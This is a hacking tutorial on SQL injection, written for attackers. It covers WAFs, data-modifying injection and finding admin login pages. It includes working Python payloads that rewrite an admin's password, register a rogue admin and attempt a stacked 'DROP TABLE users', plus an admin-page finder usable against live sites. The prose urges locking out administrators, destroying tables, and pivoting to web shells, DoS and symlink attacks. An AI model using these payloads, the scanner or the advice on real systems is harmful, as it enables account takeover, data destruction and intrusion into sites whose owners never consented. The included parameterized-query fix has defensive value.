
SQL injection
Today I'll write a tutorial covering the most common problems you run into while doing SQL injection, and the solutions to them. Anyone who has looked for tutorials on hacking a website has noticed that there are far too many SQL injection tutorials. Almost every forum has ten of them and every blog five, but most are copied from somewhere else and the author often doesn't even know why SQL injection works. All of those tutorials read like a textbook's ABCs and the result is a mess. Everyone writes tutorials about SQL injection, but nobody covers the problems that come with the attack.
What is the cause of most problems related to SQL injection?
Web developers aren't always dumb: they have heard of hackers too and have implemented security measures such as a WAF or manual filtering. A WAF (web application firewall) is meant to block malicious requests, but WAF rule sets can often be bypassed. Nobody wants their site hacked, so some protection is the norm, but it would be wrong to blame the server every time we fail. There is also a good chance that we are simply not injecting the way we should.
A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.
If you're interested in WAFs and how they work, read more on Wikipedia: http://en.wikipedia.org/wiki/Application_firewall
Is it possible to modify the information in the database by SQL injection?
Most people aren't aware of it, but it is possible. Besides SELECT, you can UPDATE, INSERT and DROP data. Most people dealing with SQL injection have never looked deeper into the attack than the average tutorial shows, and the average tutorial doesn't cover those statements, most likely because people copy and paste tutorials or just rewrite them. You might ask why anyone would update, drop or insert data when you can simply read what is already there: why create another administrator account when one already exists?
Reading data is only one part of injection, and the other statements, which have a bad reputation, are sometimes more powerful than you'd think. If you have read the available tutorials you know you can read the data, but probably not that you can modify it. If you have tried injecting you have probably run into cases where there is no administrator account: why not use INSERT to add one? There is no admin page to log into: why not DROP the table so nobody can access the data? You want to get rid of the current administrator but can't change his password: why not use UPDATE to change it? One thing to check first: whether you can run a second statement after the one you are injecting into (stacked queries) depends on the database and the driver. With the common PHP/MySQL setup you usually can't, so the UPDATE or INSERT has to be the statement you are injecting into, for example a "change password" or "register" form.
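As an added example (not code from this tutorial), here is what those statements look like when the injectable query is itself an UPDATE or INSERT. It uses Python's built-in sqlite3 module as a stand-in database; the table layout, the two handler functions and the account names are constructed for the demo. It also shows the caveat about stacked queries: the sqlite3 driver, like the classic PHP mysql_query() setup, refuses a second statement, so the DROP never runs. The last function shows the same payload against a parameterized query.

```python
import sqlite3

# Added example (not code from the tutorial). Uses Python's built-in sqlite3
# module as a stand-in DBMS; table layout, handlers and account names are constructed.

def make_db():
    """Constructed sample schema with one admin and one ordinary user."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw TEXT, role TEXT);
        INSERT INTO users (name, pw, role) VALUES ('admin', 'S3cret!', 'admin');
        INSERT INTO users (name, pw, role) VALUES ('bob', 'bobpass', 'user');
    """)
    return db

def get_row(db, name):
    return db.execute("SELECT pw, role FROM users WHERE name = ?", (name,)).fetchone()

# --- Vulnerable handlers: SQL built by string concatenation -------------------

def vuln_change_password(db, name, new_pw):
    """'Change my password' handler; name comes from the session, new_pw from the user."""
    sql = "UPDATE users SET pw = '" + new_pw + "' WHERE name = '" + name + "'"
    db.execute(sql)
    db.commit()

def vuln_register(db, name, pw):
    """Registration handler; every new account is supposed to get role 'user'."""
    sql = ("INSERT INTO users (name, pw, role) VALUES ('" + name + "', '"
           + pw + "', 'user')")
    db.execute(sql)
    db.commit()

# --- Attacks -------------------------------------------------------------------

def demo_update_injection():
    """bob changes *his* password, but the payload closes the string and
    rewrites the WHERE clause to target admin; '-- ' comments out the rest."""
    db = make_db()
    payload = "owned' WHERE name = 'admin' -- "
    vuln_change_password(db, "bob", payload)
    return get_row(db, "admin")[0]        # 'owned'

def demo_insert_injection():
    """The payload closes the VALUES tuple early, supplying its own role,
    and opens a second harmless row so the statement still parses."""
    db = make_db()
    payload = "mallory', 'pw', 'admin'), ('filler"
    vuln_register(db, payload, "x")
    return get_row(db, "mallory")[1]      # 'admin'

def demo_stacked_drop():
    """Stacked queries ('; DROP TABLE ...') depend on the driver/DBMS.
    sqlite3.execute() refuses more than one statement, so here the table survives.
    Returns True if the users table still exists."""
    db = make_db()
    try:
        vuln_register(db, "x', 'y', 'user'); DROP TABLE users; -- ", "z")
    except Exception:
        pass    # driver rejected the stacked statement
    return db.execute(
        "SELECT count(*) FROM sqlite_master WHERE name = 'users'").fetchone()[0] == 1

# --- Fixed handler: parameterized query --------------------------------------

def safe_change_password(db, name, new_pw):
    db.execute("UPDATE users SET pw = ? WHERE name = ?", (new_pw, name))
    db.commit()

def demo_parameterized():
    """The same payload is stored literally as bob's password; admin is untouched."""
    db = make_db()
    safe_change_password(db, "bob", "owned' WHERE name = 'admin' -- ")
    return get_row(db, "admin")[0], get_row(db, "bob")[0]

if __name__ == "__main__":
    print(demo_update_injection(), demo_insert_injection(),
          demo_stacked_drop(), demo_parameterized())
```

The trailing space after `--` matters on MySQL, where the comment marker must be followed by whitespace; SQLite accepts `--` either way.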
You have probably noticed that I talk a lot about things you may think you don't need to know, but this is information you have to learn and understand to become a real hacker: you have to learn how SQL databases work to figure out how those commands work, because you won't find tutorials about that online. It's like the math you learn in school: skip it and you'll be in trouble when you grow up.
How to find admin page of site?
Some sites don't have an admin control panel at all, which means you can use any method of finding the admin page and it still won't turn up, because it doesn't exist. You might ask, "I got the username and password from the database, so why is there no admin login page?" Sometimes the credentials are simply left in the database after the control panel was removed.
Most people use tools called "admin page finders". They have a fixed list of candidate paths and request each one. If a page responds with HTTP 200 the tool assumes it exists and reports "Page found"; if the server responds with 404 it assumes it doesn't. Two caveats: many sites answer 200 (or a redirect to the login form) for every path, so check the response body and not just the status code, and a 401 or 403 usually means the page exists but you're not allowed in. I don't have a tool to share at the moment, but if you download one yourself be careful, because many of them are bundled with malware.
Admin page finders usually fail when the admin page has a custom name or has been renamed, so quite often they don't help and we need an alternative. I think the best one is a site crawler. Most of you probably have Acunetix Web Vulnerability Scanner 8, which has a useful site crawler feature: it lists all the pages on the site and will find the login page as long as it is linked from somewhere the crawler can reach. Unlinked pages, of course, don't show up in a crawl.
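Here is an added example (not the tool the tutorial mentions) of the admin page finder logic described above, written in Python. The candidate path list, the fake site used for the offline run and the soft-404 markers are constructed assumptions; point find_admin_pages() at a real base URL with the default fetcher to use it for real. Beyond a plain 200/404 check, it treats 401/403 as "exists but protected", reports redirects (which often lead to the real login page) and discards 200 responses whose body says "not found".

```python
from urllib.parse import urljoin
from urllib.request import Request, build_opener, HTTPRedirectHandler
from urllib.error import HTTPError, URLError

# Added example, not a tool from the tutorial. The candidate list, the soft-404
# markers and the fake site used for the offline demo are constructed.

CANDIDATES = ["admin/", "admin.php", "administrator/", "login.php",
              "wp-login.php", "cpanel/", "manage/", "backend/"]

# Fragments that often mark a "soft 404": a 200 page that really means "not found".
SOFT_404_MARKERS = ("page not found", "not found", "does not exist")

class _NoRedirect(HTTPRedirectHandler):
    """Returning None makes urlopen raise HTTPError for 3xx instead of following it."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None

def http_fetch(url, timeout=5):
    """Fetch without following redirects; returns (status, location, body)."""
    opener = build_opener(_NoRedirect)
    req = Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, "", resp.read(4096).decode("utf-8", "replace")
    except HTTPError as e:
        return e.code, e.headers.get("Location", ""), e.read(4096).decode("utf-8", "replace")
    except URLError:
        return 0, "", ""          # connection failure: treat as missing

def classify(status, location, body):
    """Turn a raw response into found / protected / redirect / missing."""
    if status == 200:
        text = body.lower()
        if any(m in text for m in SOFT_404_MARKERS):
            return "missing"      # 200 with a 'not found' body
        return "found"
    if status in (401, 403):
        return "protected"        # exists, but access is denied
    if status in (301, 302, 303, 307, 308):
        return "redirect"         # often a bounce to the real login form
    return "missing"

def find_admin_pages(base, candidates=CANDIDATES, fetch=http_fetch):
    """Try every candidate path under base; return the ones worth a look."""
    results = {}
    for path in candidates:
        status, location, body = fetch(urljoin(base, path))
        kind = classify(status, location, body)
        if kind != "missing":
            results[path] = (kind, status, location)
    return results

# Constructed fake site for an offline run (no network needed).
FAKE_SITE = {
    "http://example.test/admin/":    (302, "/login.php", ""),
    "http://example.test/login.php": (200, "", "<form>Username</form>"),
    "http://example.test/cpanel/":   (403, "", "Forbidden"),
    "http://example.test/manage/":   (200, "", "<h1>Page not found</h1>"),  # soft 404
}

def fake_fetch(url):
    return FAKE_SITE.get(url, (404, "", "Not Found"))

if __name__ == "__main__":
    for path, info in find_admin_pages("http://example.test/", fetch=fake_fetch).items():
        print(path, info)
```

A redirect result is worth following by hand: a bounce from /admin/ to a login form tells you both that the panel exists and where its login page lives, which a bare 200/404 check would report as "not found".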
What else can I do with SQL injection besides extracting information?
There are many things you can do besides extracting data from the database, and sometimes they are much more powerful. As discussed above, sometimes the database doesn't contain the administrator's credentials, or you can't crack the hashes, and then the whole injection seems pointless because we can't use what we got from the database. We can still use a few other methods. Just as a persistent XSS can be used to launch a CSRF attack, SQL injection can be used to pivot to other attacks.
One option is a DoS (denial of service) attack through the vulnerable query. DoS is not the same thing as DDoS (distributed denial of service), which comes from many machines at once; in one sentence, a DoS attack takes the site down temporarily so users can't access it. The other option is uploading a shell through the SQL injection. Put shortly, a shell is a script we upload to the server that acts as a backdoor and lets us run commands with the web server's privileges, which sometimes lets us modify things the real administrator can't touch from the control panel. Once a shell is in place you can move on to symlink attacks, which on shared hosting can reach the other sites on the same server. Shelling the site is probably the most powerful thing you can do with it. I haven't covered how to upload a shell or cause a DoS through SQL injection here, but I probably will in my next tutorials, because shelling through SQL injection is a science of its own, just like bypassing WAFs. These are the most common methods attackers turn to when they can't get anything useful out of the database.
Of course not every website has the same vulnerabilities, and they don't always respond the way we want, so we can't perform these attacks on every site. We have all heard that imagination is unlimited and you can do whatever you like. That's largely true of hacking as well: there are more ways than I can count.
